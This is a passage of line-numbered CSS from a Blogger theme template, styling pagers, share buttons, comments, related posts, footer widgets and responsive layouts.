1140 margin-bottom: 10px;
1141 display: block;
1142}
1143.second-meta .read-more {
1144 color: #161616;
1145 font-family: 'Shadows Into Light', cursive;
1146 font-size: 14px;
1147 text-transform: capitalize;
1148 letter-spacing: 2px;
1149 font-weight: bold;
1150transition: color .3s;
1151}
1152.second-meta .read-more:hover {
1153color:$maincolor;
1154}
1155.meta-botom {
1156 display: block;
1157 overflow: hidden;
1158 border-top: 1px solid #efefef;
1159 padding: 5px 0;
1160}
1161.second-meta .share-art {
1162position: relative;
1163}
1164.second-meta .share-title {
1165color: #222222;
1166display: inline-block;
1167padding-bottom: 7px;
1168font-size: 15px;
1169font-weight: 500;
1170position: relative;
1171top: 2px;
1172float: left;
1173padding-right: 10px;
1174text-transform:uppercase;
1175}
1176.second-meta .share-art span {
1177display: none;
1178}
1179.second-meta .share-art {
1180float: right;
1181padding: 0;
1182padding-top: 0;
1183font-size: 14px;
1184font-weight: 400;
1185text-transform: capitalize;
1186}
1187.second-meta .share-art a {
1188color: #fff;
1189padding: 5px 10px;
1190margin-left: 4px;
1191border-radius: 2px;
1192display: inline-block;
1193margin-right: 0;
1194}
1195.second-meta .share-art i {color:#222;}
1196.second-meta .share-art a:hover i{opacity:0.7;}
1197.comment-link {
1198 white-space: normal;
1199}
1200#blog-pager {
1201 clear: both;
1202 text-align: center;
1203 margin: 0;
1204 font-family: 'PT Sans', sans-serif;
1205}
1206.item #blog-pager, .static_page #blog-pager, .error_page #blog-pager {
1207display:none;
1208}
1209.index .blog-pager,
1210.index #blog-pager,
1211.archive .blog-pager,
1212.archive #blog-pager {
1213 -webkit-border-radius: 0;
1214 -moz-border-radius: 0;
1215 border-radius: 0;
1216 padding: 15px 0 5px;
1217 text-align: center;
1218}
1219.showpageNum a,
1220.showpage a,
1221#blog-pager-newer-link a,
1222#blog-pager-older-link a {
1223 color: #fff;
1224 background-color: $maindarkcolor;
1225 font-size: 14px;
1226 font-weight: 400;
1227 line-height: 24px;
1228 margin-right: 5px;
1229 overflow: hidden;
1230 padding: 4px 10px;
1231 text-decoration: none
1232}
1233.showpageNum a:hover,
1234.showpage a:hover,
1235#blog-pager-newer-link a:hover,
1236#blog-pager-older-link a:hover {
1237 decoration: none;
1238 background-color: $maincolor
1239}
1240.showpageOf {
1241 display: none;
1242 font-size: 0
1243}
1244.showpagePoint {
1245 color: #fff;
1246 background-color: $maincolor;
1247 font-size: 14px;
1248 font-weight: 400;
1249 line-height: 24px;
1250 margin-right: 5px;
1251 overflow: hidden;
1252 padding: 4px 10px;
1253 text-decoration: none
1254}
1255#post-pager .blog-pager-older-link:hover, #post-pager .blog-pager-newer-link:hover {
1256color:$maincolor;
1257background:inherit;
1258}
1259#post-pager {
1260clear:both;
1261 float: left;
1262 display: block;
1263 width: 100%;
1264 box-sizing: border-box;
1265margin: 15px 0;
1266}
1267#post-pager .blog-pager-older-link, #post-pager .blog-pager-newer-link {
1268border:0;
1269text-align:right;
1270background:none;
1271color:$maindarkcolor;
1272}
1273#post-pager .blog-pager-newer-link {
1274 border: 0;
1275text-align:left;
1276}
1277#post-pager #blog-pager-newer-link, #post-pager #blog-pager-older-link {
1278 width: 50%;
1279}
1280#post-pager a b {
1281 display: block;
1282 padding: 0 0 5px;
1283 font-weight: 700;
1284 letter-spacing: 1px;
1285 font-size: 13px;
1286color:#maincolor;
1287 font-family: 'PT Sans', sans-serif;
1288}
1289#post-pager a span {
1290 text-transform:capitalize;
1291}
1292#post-pager .blog-pager-older-link, #post-pager .blog-pager-newer-link {
1293 padding:0;
1294display: block;
1295}
1296/* ######## Share widget Css ######################### */
1297.item .post-footer .share-box .post-labels {
1298 float: left;
1299}
1300
1301.item .post-footer .share-box .post-labels .label-title {
1302 color: #fff;
1303 padding: 3px 8px;
1304 font-size: 13px;
1305 background-color: $maincolor;
1306}
1307.item .post-footer .share-box .post-labels a {
1308 color: $maindarkcolor;
1309 padding: 3px 8px;
1310 font-size: 13px;
1311 background-color: #f8f8f8;
1312}
1313.post-footer .share-box {
1314position: relative;
1315padding: 10px 0;
1316text-align: center;
1317}
1318.post-footer .share-title {
1319border-bottom: 2px solid #eee;
1320color: #010101;
1321display: inline-block;
1322padding-bottom: 7px;
1323font-size: 15px;
1324font-weight: 500;
1325clear: both;
1326margin: 0 0 10px;
1327position: relative;
1328float: left;
1329}
1330.pinimg {
1331 width: 40px;
1332 height: 40px;
1333}
1334.Related-title {
1335 background: $maincolor;
1336 color: #fff;
1337 font-size: 16px;
1338 padding: 8px 16px;
1339 margin: 0 0 5px;
1340 font-weight: 600;
1341 letter-spacing: 1.5px;
1342 text-transform: uppercase;
1343 position: relative;
1344 text-align: left;
1345display: block;
1346}
1347.post-footer .share-title:after {
1348position: absolute;
1349left: 50%;
1350margin-left: -5px;
1351bottom: -5px;
1352content: "";
1353display: block;
1354width: 0;
1355height: 0;
1356border-left: 5px solid transparent;
1357border-right: 5px solid transparent;
1358border-top: 5px solid #eee;
1359}
1360.post-footer .share-art {
1361float: right;
1362padding: 0;
1363padding-top: 0;
1364font-size: 13px;
1365font-weight: 400;
1366text-transform: capitalize;
1367}
1368.post-footer .share-art a {
1369color: #fff;
1370padding: 3px 8px;
1371margin-left: 4px;
1372border-radius: 2px;
1373display: inline-block;
1374margin-right: 0;
1375background: #010101;
1376}
1377.post-footer .share-art i {
1378color:#fff;
1379}
1380.post-footer .share-art a:hover{color:#fff}
1381.post-footer .share-art .fac-art{background:#3b5998}
1382.post-footer .share-art .fac-art:hover{background:rgba(49,77,145,0.7)}
1383.post-footer .share-art .twi-art{background:#00acee}
1384.post-footer .share-art .twi-art:hover{background:rgba(7,190,237,0.7)}
1385.post-footer .share-art .goo-art{background:#db4a39}
1386.post-footer .share-art .goo-art:hover{background:rgba(221,75,56,0.7)}
1387.post-footer .share-art .pin-art{background:#CA2127}
1388.post-footer .share-art .pin-art:hover{background:rgba(202,33,39,0.7)}
1389.post-footer .share-art .lin-art{background:#0077B5}
1390.post-footer .share-art .lin-art:hover{background:rgba(0,119,181,0.7)}
1391.post-footer .share-art .wat-art{background:#25d266;display:none;}
1392.post-footer .share-art .wat-art:hover{background:rgba(37, 210, 102, 0.73)}
1393/* ######## Comments Css ######################### */
1394.comments {
1395clear: both;
1396margin: 0;
1397color: $maindarkcolor;
1398margin-top:10px;
1399box-sizing: border-box;
1400 border-radius: 5px;
1401 padding: 30px 30px 20px;
1402 background: #FFF;
1403 box-shadow: 5px 5px 45px -27px rgba(0,0,0,0.5);
1404 -webkit-box-shadow: 5px 5px 55px -27px rgba(0,0,0,0.5);
1405 -moz-box-shadow: 5px 5px 45px -27px rgba(0,0,0,0.5);
1406}
1407.post-feeds .feed-links {
1408display: none;
1409}
1410iframe.blogger-iframe-colorize,
1411iframe.blogger-comment-from-post {
1412height: 260px!important;
1413background: #fff;
1414}
1415.comment-form {
1416overflow:hidden;
1417}
1418.comments h3 {
1419line-height:normal;
1420text-transform:uppercase;
1421color:#333;
1422font-weight:bold;
1423margin:0 0 20px 0;
1424font-size:14px;
1425padding:0 0 0 0;
1426}
1427h4#comment-post-message {
1428display:none;
1429margin:0 0 0 0;
1430}
1431.comments h4{
1432color: $maindarkcolor;
1433border-bottom: 1px solid #efefef;
1434font-size: 16px;
1435padding: 12px 0;
1436margin: 0;
1437font-weight: 700;
1438letter-spacing: 1.5px;
1439text-transform: uppercase;
1440position: relative;
1441text-align: left;
1442}
1443.comments h4:after {
1444display: inline-block;
1445content: "\f075";
1446font-family: fontAwesome;
1447font-style: normal;
1448font-weight: normal;
1449font-size: 18px;
1450color: $maincolor;
1451top: 12px;
1452right: 15px;
1453padding: 0;
1454position: absolute;
1455}
1456.comments .comments-content{
1457font-size:13px;
1458margin-bottom:8px;
1459padding: 0;
1460}
1461.comments .comments-content .comment-thread ol{
1462list-style:none;
1463text-align:left;
1464margin:13px 0;
1465padding:0
1466}
1467.comments .comments-content .comment-thread ol li{
1468list-style:none;
1469}
1470.comments .avatar-image-container {
1471background:#fff;
1472border:1px solid #DDD;
1473overflow:hidden;
1474padding:0;
1475border-radius: 50%;
1476}
1477.comments .avatar-image-container img {
1478border-radius:50%;
1479}
1480.comments .comment-block{
1481position:relative;
1482background:#fff;
1483padding:15px;
1484margin-left:60px;
1485border: 1px solid #efefef;
1486}
1487.comments .comment-block:before {
1488content:"";
1489width:0px;
1490height:0px;
1491position:absolute;
1492right:100%;
1493top:14px;
1494border-width:10px;
1495border-style:solid;
1496border-color:transparent #DDD transparent transparent;
1497display:block;
1498}
1499.comments .comments-content .comment-replies{
1500margin:8px 0;
1501margin-left:60px
1502}
1503.comments .comments-content .comment-thread:empty{
1504display:none
1505}
1506.comments .comment-replybox-single {
1507background:#f0f0f0;
1508padding:0;
1509margin:8px 0;
1510margin-left:60px
1511}
1512.comments .comment-replybox-thread {
1513background:#f0f0f0;
1514margin:8px 0 0 0;
1515padding:0;
1516}
1517.comments .comments-content .comment{
1518margin-bottom:6px;
1519padding:0
1520}
1521.comments .comments-content .comment:first-child {
1522padding:0;
1523margin:0
1524}
1525.comments .comments-content .comment:last-child {
1526padding:0;
1527margin:0
1528}
1529.comments .comment-thread.inline-thread .comment, .comments .comment-thread.inline-thread .comment:last-child {
1530margin:0px 0px 5px 30%
1531}
1532.comment .comment-thread.inline-thread .comment:nth-child(6) {
1533margin:0px 0px 5px 25%;
1534}
1535.comment .comment-thread.inline-thread .comment:nth-child(5) {
1536margin:0px 0px 5px 20%;
1537}
1538.comment .comment-thread.inline-thread .comment:nth-child(4) {
1539margin:0px 0px 5px 15%;
1540}
1541.comment .comment-thread.inline-thread .comment:nth-child(3) {
1542margin:0px 0px 5px 10%;
1543}
1544.comment .comment-thread.inline-thread .comment:nth-child(2) {
1545margin:0px 0px 5px 5%;
1546}
1547.comment .comment-thread.inline-thread .comment:nth-child(1) {
1548margin:0px 0px 5px 0;
1549}
1550.comments .comments-content .comment-thread{
1551margin:0;
1552padding:0
1553}
1554.comments .comments-content .inline-thread{
1555background: #fff;
1556padding:15px;
1557box-sizing:border-box;
1558margin:0
1559}
1560.comments .comments-content .inline-thread .comment-block {
1561border-color: $maincolor;
1562}
1563.comments .comments-content .inline-thread .comment-block:before {
1564border-color: transparent $maincolor transparent transparent;
1565}
1566.comments .comments-content .user {
1567font-family: 'PT Sans', sans-serif;
1568letter-spacing: 0.5px;
1569font-weight: 600;
1570}
1571.comments .comments-content .icon.blog-author {
1572display:inline;
1573}
1574.comments .comments-content .icon.blog-author:after {
1575content: "Author";
1576background:$maincolor;
1577font-family: 'PT Sans', sans-serif;
1578color: #fff;
1579font-size: 11px;
1580padding: 2px 5px;
1581text-transform:Capitalize;
1582font-style:italic;
1583letter-spacing: 0.3px;
1584}
1585.comment-header {
1586text-transform:uppercase;
1587font-size:12px;
1588}
1589.comments .comments-content .datetime {
1590margin-left: 6px;
1591}
1592.comments .comments-content .datetime a {
1593color:#888;
1594}
1595.comments .comment .comment-actions a {
1596display:inline-block;
1597color:#333;
1598font-weight:bold;
1599font-size:10px;
1600line-height:15px;
1601margin:4px 8px 0 0;
1602}
1603.comments .continue a {
1604color:#333;
1605display:inline-block;
1606font-size:10px;
1607}
1608.comments .comment .comment-actions a:hover, .comments .continue a:hover{
1609text-decoration:underline;
1610}
1611/* ######## Related Post Css ######################### */
1612#related-posts {
1613margin-bottom: 10px;
1614padding: 10px 0;
1615}
1616.related li {
1617width: 32%;
1618display: inline-block;
1619height: auto;
1620min-height: 184px;
1621float: left;
1622margin-right: 10px;
1623overflow: hidden;
1624position: relative;
1625}
1626.related li h3 {
1627margin-top:0;
1628}
1629.related-thumb {
1630width: 100%;
1631height: 100px;
1632overflow: hidden;
1633border-radius: 2px;
1634}
1635.related li .related-img {
1636width: 100%;
1637height: 100px;
1638display: block;
1639position: relative;
1640transition: all .3s ease-out!important;
1641-webkit-transition: all .3s ease-out!important;
1642-moz-transition: all .3s ease-out!important;
1643-o-transition: all .3s ease-out!important;
1644}
1645.related li .related-img:hover {
1646-webkit-transform: scale(1.1) rotate(-1.5deg)!important;
1647-moz-transform: scale(1.1) rotate(-1.5deg)!important;
1648transform: scale(1.1) rotate(-1.5deg)!important;
1649transition: all .3s ease-out!important;
1650-webkit-transition: all .3s ease-out!important;
1651-moz-transition: all .3s ease-out!important;
1652-o-transition: all .3s ease-out!important;
1653}
1654.related-title a {
1655font-size: 12px;
1656line-height: 1.4em;
1657padding: 10px 0 0;
1658font-family: 'PT Sans', sans-serif;
1659font-weight: 400;
1660font-style: normal;
1661letter-spacing: 1px;
1662color: #010101;
1663display: block;
1664}
1665.related li:nth-of-type(3n) {
1666margin-right: 0;
1667}
1668.related .related-tag {
1669display:none;
1670}
1671
1672.related-overlay {
1673position: absolute;
1674left: 0;
1675top: 0;
1676z-index: 1;
1677width: 100%;
1678height: 100%;
1679background-color: rgba(40,35,40,0.05);
1680}
1681.related-content {
1682display: block;
1683bottom: 0;
1684padding: 0px 0px 11px;
1685width: 100%;
1686line-height: 1.2em;
1687box-sizing: border-box;
1688z-index: 2;
1689}
1690.related .related-content .recent-date {
1691 font-size: 10px;
1692}
1693.recent-date:before, .p-date:before {
1694content: '\f017';
1695font-family: fontawesome;
1696margin-right: 5px;
1697}
1698/*****************************************
1699Footer Bottom CSS
1700******************************************/
1701#lower {
1702margin:auto;
1703padding: 0px 0px 10px 0px;
1704width: 100%;
1705background:#fff;
1706}
1707#lower-wrapper {
1708margin:auto;
1709padding: 20px 0px 20px 0px;
1710}
1711#lowerbar-wrapper {
1712float: left;
1713margin: 0px 5px auto;
1714padding-bottom: 20px;
1715width: 32%;
1716text-align: justify;
1717color:#000;
1718line-height: 1.6em;
1719word-wrap: break-word;
1720overflow: hidden;
1721max-width: 375px;
1722}
1723.lowerbar {margin: 0; padding: 0;}
1724.lowerbar .widget {margin: 0; padding: 10px 10px 0px 10px;box-sizing:border-box;}
1725.lowerbar h2 {
1726 background:$maincolor;
1727 color: #fff;
1728 font-size: 16px;
1729 padding: 8px 16px;
1730 margin: 0 0 20px;
1731 font-weight: 700;
1732 letter-spacing: 1.5px;
1733 text-transform: uppercase;
1734 position: relative;
1735 text-align: center;
1736}
1737.lowerbar ul {
1738margin: 0 auto;
1739padding: 0;
1740list-style-type: none;
1741}
1742.lowerbar li {
1743display:block;
1744line-height: 1.6em;
1745margin-left: 0 !important;
1746list-style-type: none;
1747}
1748.lowerbar li a {
1749text-decoration:none; color: #000;
1750}
1751.lowerbar li a:hover {
1752text-decoration:none;
1753}
1754
1755/* ######## Footer Css ######################### */
1756#jugas_footer {
1757 background: #fff;
1758 color: $maindarkcolor;
1759font-family:'PT Sans', sans-serif;
1760 font-weight: 400;
1761 padding: 20px 0px;
1762}
1763.copy-container {
1764 margin: 0 auto;
1765 overflow: hidden;
1766}
1767.jugas_footer_copyright a {
1768 color: $maincolor;
1769}
1770.jugas_footer_copyright {
1771 text-align: left;
1772display:inline-block;
1773 line-height: 30px;
1774}
1775/* ######## Custom Widget Css ######################### */
1776.insta-wrap {
1777 padding: 10px 0 0;
1778 text-align: center;
1779}
1780.insta-wrap h2 {
1781 display:none;
1782}
1783.instag ul.thumbnails > li {
1784 width: 32% !important;
1785}
1786.instag ul.thumbnails > li img:hover {
1787 opacity: .8;
1788}
1789.instag ul li {
1790 margin: 0;
1791 padding-bottom: 0;
1792 border-bottom: none;
1793}
1794#instafeed {
1795 width: 100%;
1796 display: block;
1797 margin: 0;
1798 padding: 0;
1799 line-height: 0
1800}
1801#instafeed img {
1802 height: auto;
1803 width: 100%
1804}
1805#instafeed a {
1806 padding: 0;
1807 margin: 0;
1808 display: inline-block;
1809 position: relative
1810}
1811#instafeed a:before {
1812 content: "";
1813 position: absolute;
1814 top: 0;
1815 right: 0;
1816 bottom: 0;
1817 height: 100%;
1818 width: 100%;
1819 left: 0;
1820 background: -webkit-gradient(linear, 0% 0%, 0% 100%, from(rgba(255, 255, 255, .15)), to(rgba(0, 0, 0, .25))), -webkit-gradient(linear, left top, right bottom, color-stop(0, rgba(255, 255, 255, 0)), color-stop(0.5, rgba(255, 255, 255, .1)), color-stop(0.501, rgba(255, 255, 255, 0)), color-stop(1, rgba(255, 255, 255, 0)));
1821 background: -moz-linear-gradient(top, rgba(255, 255, 255, .15), rgba(0, 0, 0, .25)), -moz-linear-gradient(left top, rgba(255, 255, 255, 0), rgba(255, 255, 255, .1) 50%, rgba(255, 255, 255, 0) 50%, rgba(255, 255, 255, 0));
1822 background: linear-gradient(top, rgba(255, 255, 255, .15), rgba(0, 0, 0, .25)), linear-gradient(left top, rgba(255, 255, 255, 0), rgba(255, 255, 255, .1) 50%, rgba(255, 255, 255, 0) 50%, rgba(255, 255, 255, 0));
1823 z-index: 1;
1824}
1825#instafeed li {
1826 position: relative;
1827 width: 16.666%;
1828 display: inline-block;
1829 margin: 0!important;
1830 padding: 0!important;
1831 background: #fff;
1832 border: 0
1833}
1834#instafeed .insta-likes {
1835 width: 100%;
1836 height: 100%;
1837 margin-top: -100%;
1838 opacity: 0;
1839 text-align: center;
1840 letter-spacing: 1px;
1841 background: rgba(255, 255, 255, 0.4);
1842 position: absolute;
1843 text-shadow: 2px 2px 8px #fff;
1844 font: normal 400 11px Roboto, sans-serif;
1845 color: #222;
1846 line-height: normal;
1847}
1848#instafeed a:hover .insta-likes {
1849 opacity: 1
1850}
1851.featureinsta {
1852 margin: auto;
1853 position: relative;
1854 height: auto;
1855 overflow: hidden;
1856}
1857.sidebar .FollowByEmail > h3.title,
1858.sidebar .FollowByEmail .title-wrap {
1859 margin-bottom: 0
1860}
1861.FollowByEmail td {
1862 width: 100%;
1863 float: left;
1864 box-sizing: border-box
1865}
1866.FollowByEmail .follow-by-email-inner .follow-by-email-submit {
1867 margin-left: 0;
1868 width: 100%;
1869 border-radius: 0;
1870 height: 30px;
1871 font-size: 11px;
1872 color: #fff;
1873 background-color: $maincolor;
1874 font-family: inherit;
1875 text-transform: uppercase;
1876 font-weight: 700;
1877 letter-spacing: 1px
1878}
1879.FollowByEmail .follow-by-email-inner .follow-by-email-submit:hover {
1880 opacity:0.8;
1881}
1882.FollowByEmail .follow-by-email-inner .follow-by-email-address {
1883 padding-left: 10px;
1884 height: 30px;
1885 border: 1px solid #FFF;
1886 margin-bottom: 5px;
1887 box-sizing: border-box;
1888 font-size: 11px;
1889 font-family: inherit
1890}
1891.FollowByEmail .follow-by-email-inner .follow-by-email-address:focus {
1892 border: 1px solid #FFF
1893}
1894.FollowByEmail .widget-content {
1895 background-color: $maindarkcolor;
1896 box-sizing: border-box;
1897 padding: 10px
1898}
1899.FollowByEmail .widget-content:before {
1900 content: "Enter your email address to subscribe to this blog and receive notifications of new posts by email.";
1901 font-size: 11px;
1902 color: #f2f2f2;
1903 line-height: 1.4em;
1904 margin-bottom: 5px;
1905 display: block;
1906 padding: 0 2px
1907}
1908.list-label-widget-content li {
1909 display: block;
1910 padding: 8px 0;
1911 border-bottom: 1px solid #f2f2f2;
1912 position: relative
1913}
1914.list-label-widget-content li:first-child {
1915 padding: 0 0 8px
1916}
1917.list-label-widget-content li:last-child {
1918 padding-bottom: 0;
1919 border-bottom: 0
1920}
1921.list-label-widget-content li a:before {
1922 content: '\f02c';
1923 font-size: 13px;
1924 color: $maindarkcolor;
1925font-family: fontawesome;
1926margin-right: 5px;
1927}
1928
1929.list-label-widget-content li a {
1930 color: $maindarkcolor;
1931 font-size: 11px;
1932 font-weight: 700;
1933 text-transform: uppercase;
1934 transition: color .3s
1935}
1936.list-label-widget-content li a:hover {
1937 color: $maincolor
1938}
1939.list-label-widget-content li span:last-child {
1940 color: $maindarkcolor;
1941 font-size: 11px;
1942 font-weight: 700;
1943 position: absolute;
1944 top: 8px;
1945 right: 0
1946}
1947.list-label-widget-content li:first-child span:last-child {
1948 top: 2px
1949}
1950.cloud-label-widget-content {
1951 text-align: left
1952}
1953.cloud-label-widget-content .label-count {
1954 background: $maincolor;
1955 color: #fff!important;
1956 margin-left: -3px;
1957 white-space: nowrap;
1958 border-radius: 0;
1959 padding: 1px 4px!important;
1960 font-size: 12px!important;
1961 margin-right: 5px;
1962 transition: background .3s
1963}
1964.cloud-label-widget-content .label-size {
1965 background: #f5f5f5;
1966 display: block;
1967 float: left;
1968 font-size: 11px;
1969 margin: 0 5px 5px 0;
1970 transition: background .3s
1971}
1972.cloud-label-widget-content .label-size a,
1973.cloud-label-widget-content .label-size span {
1974 height: 18px!important;
1975 color: $maindarkcolor;
1976 display: inline-block;
1977 font-size: 11px;
1978 font-weight: 700!important;
1979 text-transform: uppercase;
1980 padding: 6px 8px;
1981 transition: color .3s
1982}
1983.cloud-label-widget-content .label-size a {
1984 padding: 6px 10px
1985}
1986.cloud-label-widget-content .label-size a:hover {
1987 color: #fff!important
1988}
1989.cloud-label-widget-content .label-size,
1990.cloud-label-widget-content .label-count {
1991 height: 30px!important;
1992 line-height: 19px!important
1993}
1994.cloud-label-widget-content .label-size:hover {
1995 background: $maincolor;
1996 color: #fff!important
1997}
1998.cloud-label-widget-content .label-size:hover a {
1999 color: #fff!important
2000}
2001.cloud-label-widget-content .label-size:hover span {
2002 background: $maindarkcolor;
2003 color: #fff!important;
2004 cursor: pointer
2005}
2006.cloud-label-widget-content .label-size-1,
2007.label-size-2,
2008.label-size-3,
2009.label-size-4,
2010.label-size-5 {
2011 font-size: 100%;
2012 opacity: 10
2013}
2014.label-size-1,
2015.label-size-2 {
2016 opacity: 100
2017}
2018#ads-blog .widget {
2019width: 728px;
2020max-height: 90px;
2021padding:0;
2022margin: 0px auto 15px !important;
2023max-width: 100%;
2024box-sizing: border-box;
2025}
2026#ads-blog-bottom .widget {
2027width: 728px;
2028max-height: 90px;
2029padding:0;
2030margin: 0px auto 15px !important;
2031max-width: 100%;
2032box-sizing: border-box;
2033}
2034#ads-blog-content .widget {
2035text-align:center;
2036max-height: 90px;
2037padding:0;
2038margin: 20px auto 0 !important;
2039max-width: 100%;
2040box-sizing: border-box;
2041}
2042#ads-blog-content .widget .widget-content {
2043display:inline-block;
2044}
2045.ads-blog-post-top, .ads-blog-post-bottom {
2046display:none;
2047visibility:hidden;
2048}
2049.PopularPosts .item-thumbnail{margin:0 15px 0 0 !important;width:90px;height:65px;float:left;overflow:hidden; position: relative}
2050.PopularPosts .item-thumbnail a{position:relative;display:block;overflow:hidden;line-height:0}
2051.PopularPosts ul li img{width:90px;height:65px;object-fit:cover;padding:0;transition:all .3s ease}
2052.PopularPosts .widget-content ul li{overflow:hidden;padding:10px 0;border-top:1px solid #f2f2f2}
2053.sidebar .PopularPosts .widget-content ul li:first-child,.sidebar .custom-widget li:first-child,.tab-widget .PopularPosts .widget-content ul li:first-child,.tab-widget .custom-widget li:first-child{padding-top:0;border-top:0}
2054.sidebar .PopularPosts .widget-content ul li:last-child,.sidebar .custom-widget li:last-child,.tab-widget .PopularPosts .widget-content ul li:last-child,.tab-widget .custom-widget li:last-child{padding-bottom:0}
2055.PopularPosts ul li a{color:#333333;font-weight:400;font-size:16px;line-height:1.4em;transition:color .3s; font-family: 'PT Sans', sans-serif;}
2056.PopularPosts ul li a:hover{color:$maincolor}
2057.PopularPosts .item-title{margin:0 0 4px;padding:0;line-height:0}
2058.item-snippet{display:none;font-size:0;padding-top:0}
2059.PopularPosts ul {
2060counter-reset: popularcount;
2061margin: 0;
2062padding: 0;
2063}
2064.PopularPosts .item-thumbnail::before {
2065background: rgba(0, 0, 0, 0.3);
2066bottom: 0px;
2067content: "";
2068height: 100px;
2069width: 100px;
2070left: 0px;
2071right: 0px;
2072margin: 0px auto;
2073position: absolute;
2074z-index: 3;
2075}
2076/* ######## Responsive Css ######################### */
2077@media only screen and (max-width: 1150px) {
2078.row {
2079width: 96% !important;
2080margin: 0 auto;
2081float: none;
2082}
2083.tyard-wrapper {
2084 margin: 10px auto 0;
2085}
2086}
2087@media only screen and (max-width: 1050px) {
2088
2089
2090}
2091@media only screen and (max-width: 980px) {
2092#main-wrapper, #sidebar-wrapper {
2093float: none;
2094clear: both;
2095width: 100%;
2096margin: 0 auto;
2097}
2098
2099.post-body {
2100padding:0;
2101}
2102#main-wrapper {
2103max-width: 100%;
2104}
2105#sidebar-wrapper {
2106padding-top: 20px;
2107}
2108#lowerbar-wrapper {
2109 width: 100%;
2110 max-width: 375px;
2111 margin: 0 auto;
2112 float: none;
2113 clear: both;
2114}
2115.overlay a {
2116float: right;
2117margin: 30px 0;
2118}
2119.overlay h3 {
2120float: left;
2121}
2122}
2123@media screen and (max-width: 880px) {
2124
2125.home #header-wrapper {
2126margin-bottom: 10px;
2127}
2128#nav, #nav1 {
2129display:none;
2130}
2131.selectnav {
2132width: auto;
2133color: #222;
2134background: #f4f4f4;
2135border: 1px solid rgba(255,255,255,0.1);
2136position: relative;
2137border: 0;
2138padding: 6px 10px!important;
2139margin: 5px 0;
2140}
2141.selectnav {
2142display: block;
2143width: 100%;
2144max-width:200px;
2145}
2146.navi-menu .selectnav {
2147display:inline-block;
2148 margin: 10px 0 0 10px;
2149}
2150#menu {
2151text-align:center;
2152}
2153.item #content-wrapper {
2154padding: 10px 0 30px;
2155}
2156}
2157@media only screen and (max-width: 768px) {
2158.related li {
2159width: 48%;
2160}
2161.related li:nth-of-type(2), .related li:nth-of-type(4), .related li:nth-of-type(6), .related li:nth-of-type(8), .related li:nth-of-type(10), .related li:nth-of-type(12) {
2162 margin-right: 0;
2163}
2164#post-pager #blog-pager-newer-link {
2165 margin: 0 auto 10px;
2166}
2167#post-pager #blog-pager-older-link, #post-pager #blog-pager-newer-link {
2168 float: none;
2169 clear: both;
2170 margin: 0 auto;
2171 display: block;
2172width:100%;
2173}
2174.share-art span {
2175display: none;
2176}
2177.post-footer .share-art .wat-art{display:inline-block;}
2178.ops-404 {
2179width: 80%!important;
2180}
2181.title-404 {
2182font-size: 160px!important;
2183}
2184.overlay {
2185display:none;
2186visibility:hidden;
2187}
2188.post-labels {
2189margin-bottom: 10px;
2190}
2191}
2192@media screen and (max-width: 767px) {
2193.tyard .ty-first {
2194 width: 100%;
2195 padding: 0;
2196 float: none;
2197 clear: both;
2198 margin-bottom: 10px;
2199}
2200.tyard .ty-first .tyard-thumb, .tyard .ty-img {
2201 height: 220px;
2202}
2203.index .post-outer, .archive .post-outer {
2204 padding: 0;
2205 float: none;
2206 width: 100%;
2207}
2208.index .post-outer:nth-child(2n), .archive .post-outer:nth-child(2n) {
2209 padding-left: 0;
2210 padding-right: 0;
2211}
2212}
2213@media only screen and (max-width: 480px) {
2214#header-inner {
2215max-width:100%;
2216}
2217.top-bar-social #social a:after {
2218 display:none;
2219}
2220.top-bar-social #social a, .bottom-bar-social #social a {
2221width:25px;
2222height:25px;
2223}
2224.top-bar-social #social a {
2225 padding: 0 0 5px;
2226}
2227.comments .comments-content .comment-replies {
2228margin-left: 0;
2229}
2230.related li {
2231width: 100%;
2232 float: none;
2233 margin-right: 0;
2234clear:both;
2235}
2236.post, .comments {
2237 padding: 15px 15px 10px;
2238}
2239.second-meta .share-art {
2240 float: none;
2241}
2242.second-meta .share-title {
2243 display: none;
2244}
2245.owl-prev, .owl-next {
2246 top: 10px;
2247}
2248.sora-slide .ty-bonos-entry a {
2249font-size:20px;
2250}
2251.index .post h2, .archive .post h2 {
2252line-height: 1.4em;
2253font-size: 19px;
2254}
2255.block-image {
2256 float: none;
2257 margin: 0 auto;
2258 clear: both;
2259 width: 100%;
2260}
2261.jugas_footer_copyright {
2262 text-align: center;
2263 display: block;
2264 clear: both;
2265}
2266.top-bar-social, .bottom-bar-social {
2267 float: none;
2268 width: 100%;
2269 clear: both;
2270 overflow: hidden;
2271}
2272.top-bar-menu {
2273 float: none;
2274 width: 100%;
2275 clear: both;
2276 text-align: center;
2277 margin-top: 10px;
2278}
2279.top-bar-social li, .bottom-bar-social li {
2280 display: inline-block;
2281 float: none;
2282}
2283.top-bar-menu .selectnav {
2284 width: 100%;
2285max-width:100%
2286}
2287h1.post-title {
2288font-size: 22px;
2289margin-bottom: 10px;
2290line-height: 1.4em;
2291}
2292.breadcrumbs {
2293display:none;
2294}
2295#sidebar-wrapper {
2296max-width: 100%;
2297}
2298.about-widget-image {
2299overflow: hidden;
2300}
2301.share-art {
2302 float: none;
2303 margin: 0 auto;
2304 text-align: center;
2305 clear: both;
2306}
2307.share-title{
2308display:none;
2309}
2310.blog-pager-newer-link .pager-title, .blog-pager-newer-link .pager-heading, .blog-pager-older-link .pager-title, .blog-pager-older-link .pager-heading {
2311display: none;
2312}
2313.blog-pager-older-link .post-nav-icon, .blog-pager-newer-link .post-nav-icon {
2314line-height: 40px;
2315width: 100%;
2316}
2317}
2318@media only screen and (max-width: 360px) {
2319#header-inner img {
2320max-width: 100%;
2321margin: 0 auto;
2322float: none;
2323height: auto;
2324}
2325#meta-post {
2326position: relative;
2327overflow: hidden;
2328display: block;
2329border-bottom: 1px solid #f2f2f2;
2330}
2331#meta-post:after {
2332display: none;
2333}
2334.index .post h2, .archive .post h2 {
2335font-size: 16px;
2336}
2337.share-art {
2338float: none;
2339clear: both;
2340margin: 0 auto;
2341text-align: center;
2342}
2343}
2344@media only screen and (max-width: 300px) {
2345#sidebar-wrapper, #search-bar {display:none}
2346#menu {
2347 text-align: center;
2348}
2349.top-bar-menu,.selectnav{width:100%}
2350.top-bar-search, #ads-blog {
2351display: none;
2352}
2353.archive .post h2,.index .post h2 {
2354line-height: 1.4em !important;
2355font-size: 14px!important;
2356}
2357.index .snippets,.archive .snippets,.sora-author-box img,.share-box .post-author {
2358display: none;
2359}
2360.share-art, .share-box .post-author {
2361float: none;
2362margin: 0 auto;
2363text-align: center;
2364clear: both;
2365}
2366.read-more-wrap, .post-labels {
2367float: none !important;
2368clear: both;
2369display: block;
2370text-align: center;
2371}
2372.ops-404 {
